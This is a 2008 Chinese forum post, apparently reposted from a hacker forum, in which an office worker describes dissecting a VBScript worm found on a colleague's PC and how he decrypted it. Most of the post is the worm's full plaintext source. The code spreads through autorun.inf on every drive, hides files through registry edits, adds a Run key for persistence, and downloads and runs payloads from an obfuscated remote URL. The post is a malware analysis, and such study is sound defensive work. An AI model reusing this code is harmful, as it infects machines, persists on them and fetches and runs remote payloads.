|
  
- UID
- 6919
- 帖子
- 1041
- 功勋
- 2457 点
- 军饷
- 5740 元
- 阅读权限
- 110
     
|
楼主
发表于 2008-11-23 11:20
| 只看该作者
前提:
最近同个办公室的人反映自己莫名奇妙地中病毒,我没放在心上,没想到自己人中了一个,所以就有了今天的这个帖子。
话说,某天晚上我们一伙人正在赶工。。。突然,某人大呼:“我的CPU占用率怎么居高不下?”抄起processxp,发现wscript.exe一直在找一个main.vbe,没事怎么会乱运行脚本呢?肯定中毒了!而且可能是传说中的办公室病毒。。。真不巧,遇到我们了。。。呵呵,开始解剖吧!对于这种脚本病毒,我们的解决方法是禁用vbscript.dll,运行“regsrv -u vbscript.dll”,然后CPU就安静下来了。。。那么打开我们的main.vbe吧!在C盘根目录下,首先去掉这个脚本病毒的隐藏和系统属性,然后用记事本打开看看!全是乱码!哎~又是老一套,加密给受害者看,看到头大了,自然没有消灭的想法,但是要运行的话肯定也要解密!果然,在密密麻麻的乱码后面,出现一句excute(thistext),这个thistext不就是病毒明文吗?好,那就把它写出来!把excute(thistext)换成
Dim fso, MyFile
Set fso = CreateObject("Scripting.FileSystemObject")
Set MyFile = fso.CreateTextFile("c:\testfile.txt", True)
MyFile.WriteLine(thistext)
MyFile.Close
在注册一下vbscript.dll
运行!一下子就把病毒揪出来了!
代码:
ver="3.0"
tile="daxian"&ver
about="daxianbiyele 2007.7.11"
fromurl=chr(104)&chr(116)&chr(116)&chr(112)&"://"&chr(104)&chr(103)&"z."&chr(100)&"in"&chr(103)&chr(104)&"ui123."&chr(99)&"n/wan."&chr(97)&"s"&chr(112)
on error resume next
dim wsh
dim WshShell
Set Wsh =CreateObject("WScript.Shell")
set WshShell=Wscript.CreateObject("Wscript.Shell")
Set FSO = CreateObject("Scripting.FileSystemObject")
set dir = FSO.GetSpecialFolder(1)
Set dc = FSO.Drives
ouwnname=Wscript.ScriptName
mulu=left(Wscript.ScriptFullName,len(Wscript.ScriptFullName)-len(Wscript.ScriptName))
if mulu=dir&"\" then sys=true
For Each d In dc
if mulu=d&"\" then opendisk=WshShell.Run("explorer "&d,3,false)
Next
if not sys=true then
wscript.sleep 2000
set y=getobject("winmgmts:\\.\root\cimv2")
set x=y.execquery("select * from win32_process where name='wscript.exe'")
i=0
for each j in x
i=i+1
next
if i>1 then wscript.quit
end if
yincang
If fso.FileExists(mulu&"autorun.inf") Then
if readtxt(mulu&"autorun.inf",1)<>tile then
buildinf ver,"7+11.exe",now
end If
else
buildinf ver,"7+11.exe",now
End If
copyexe=readtxt(mulu&"autorun.inf",7)
randomize
sjs=int(Rnd * (31-1+1)) + 1
If fso.FileExists(mulu©exe) and Day(Date)<>sjs then
if sys=true then WshShell.run mulu©exe
Else
Ldownver=readtxt(mulu&"autorun.inf",5)
downfile mulu&"temp.txt",fromurl,0
Set OpenFile = FSO.OpenTextFile(mulu&"temp.txt", 1)
nouse = OpenFile.ReadLine
downis = OpenFile.ReadLine
downver = OpenFile.ReadLine
downname = month(Date)&"+"&Day(Date)&".exe"
downfrom = OpenFile.ReadLine
vbsver = OpenFile.ReadLine
vbsname = OpenFile.ReadLine
vbsurl = OpenFile.ReadLine
guanggao= OpenFile.ReadLine
OpenFile.Close
FSO.DeleteFile(mulu&"temp.txt")
if downis=1 then
If vbsver<>ver then
downfile mulu&vbsname,vbsurl,1
wscript.quit
end if
If downver<>Ldownver then
downfile mulu&downname,downfrom,0
buildinf downver,downname,guanggao
end if
end if
End If
copyexe=readtxt(mulu&"autorun.inf",7)
if sys=true then
ganran()
WshShell.run mulu&ouwnname
else
shuxing mulu&ouwnname,2+4
copyvbs dir&"\main.vbe"
copyvbs dir&"\main.txt"
CopyFile mulu&"autorun.inf",dir&"\autorun.inf"
CopyFile mulu©exe,dir&"\"©exe
shuxing dir&"\"©exe,2+4
if mulu<>"C:\" then
copyvbs "c:\main.vbs"
CopyFile mulu&"autorun.inf","c:\autorun.inf"
CopyFile mulu©exe,"c:\"©exe
end if
zhuce
WshShell.run dir&"\main.vbe"
end if
function copyfile(file,where)
shuxing where,0
if fso.FileExists(file) then FSO.CopyFile file,where,True
end function
function copyvbs(where)
shuxing where,0
set self=fso.opentextfile(mulu&ouwnname,1)
vbscopy=self.readall
self.close
set vbs = fso.CreateTextFile(where, True)
vbs.write vbscopy
vbs.close
shuxing where,2+4
end function
function zhuce()
RegPath="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\run\"
Type_Name="REG_SZ"
Key_Name="explorer"
Key_Data="main.vbe"
WshShell.RegWrite RegPath&Key_Name,Key_Data,Type_Name
end function
function yincang()
RegPath="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"
Type_Name="REG_DWORD"
Key_Name="ShowSuperHidden"
Key_Data="00000000"
WshShell.RegWrite RegPath&Key_Name,Key_Data,Type_Name
end function
function buildinf(exever,exename,adv)
shuxing mulu&"autorun.inf",0
set ini = fso.CreateTextFile(mulu&"autorun.inf", True)
ini.writeline tile
ini.writeline "[AutoRun]"
ini.writeline about
ini.writeline "open=WScript.exe .\main.vbs"
ini.writeline exever
ini.writeline "shell\open=打开(&O)"
ini.writeline exename
ini.writeline "shell\open\Command=WScript.exe .\main.vbs"
ini.writeline "shell\open\Default=1"
ini.writeline adv
ini.close
shuxing mulu&"autorun.inf",1+2+4
end function
function readtxt(where,line)
Set readfile = fso.OpenTextFile(where, 1)
i=0
do while i<line
i=i+1
RLine = readfile.ReadLine
loop
readfile.Close
readtxt=RLine
end function
function shuxing(file,change)
if fso.FileExists(file) then
Set oFile = FSO.GetFile(file)
oFile.Attributes = change
Set oFile = Nothing
end if
end function
function downfile(localfile,urlfile,runfile)
shuxing localfile,0
iLocal = LCase(localfile):iRemote = LCase(urlfile):
'if 1=2 then Wscript.echo "Impossible!"
Set xPost = CreateObject("Microsoft.XMLHTTP")
'if 1=2 then Wscript.echo "Impossible!"
xPost.Open "get",iRemote,0
'if 1=2 then Wscript.echo "Impossible!"
xPost.Send()
'if 1=2 then Wscript.echo "Impossible!"
Set sGet = CreateObject("ADODB.Stream")
'if 1=2 then Wscript.echo "Impossible!"
sGet.Mode = 3
'if 1=2 then Wscript.echo "Impossible!"
sGet.Type = 1
'if 1=2 then Wscript.echo "Impossible!"
sGet.Open()
'if 1=2 then Wscript.echo "Impossible!"
sGet.Write(xPost.responseBody)
'if 1=2 then Wscript.echo "Impossible!"
sGet.SaveToFile iLocal,2
'if 1=2 then Wscript.echo "Impossible!"
shuxing localfile,2+4
if runfile=1 then Wsh.run iLocal
end function
function ganran()
do
For Each d In dc
If d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
If fso.FileExists(d&"\main.vbs") and fso.FileExists(d&"\autorun.inf") then
if readtxt(d&"\autorun.inf",1)<>tile then
CopyFile dir&"\autorun.inf",d&"\autorun.inf"
CopyFile dir&"\"©exe,d&"\"©exe
CopyFile dir&"\main.txt",d&"\main.vbs"
end if
else
CopyFile dir&"\autorun.inf",d&"\autorun.inf"
CopyFile dir&"\"©exe,d&"\"©exe
CopyFile dir&"\main.txt",d&"\main.vbs"
end if
End If
next
wscript.sleep 2000
loop
end function
后记:
呵呵,临时解决方法在上面了,我也没时间去解读这个病毒了~~~还请高手们给出完美解决方案!继续赶工ing。。。。。。
转自红色黑客联盟 |
|
发表于 2008-11-24 14:17
| 
发表于 2008-12-10 21:21
| 
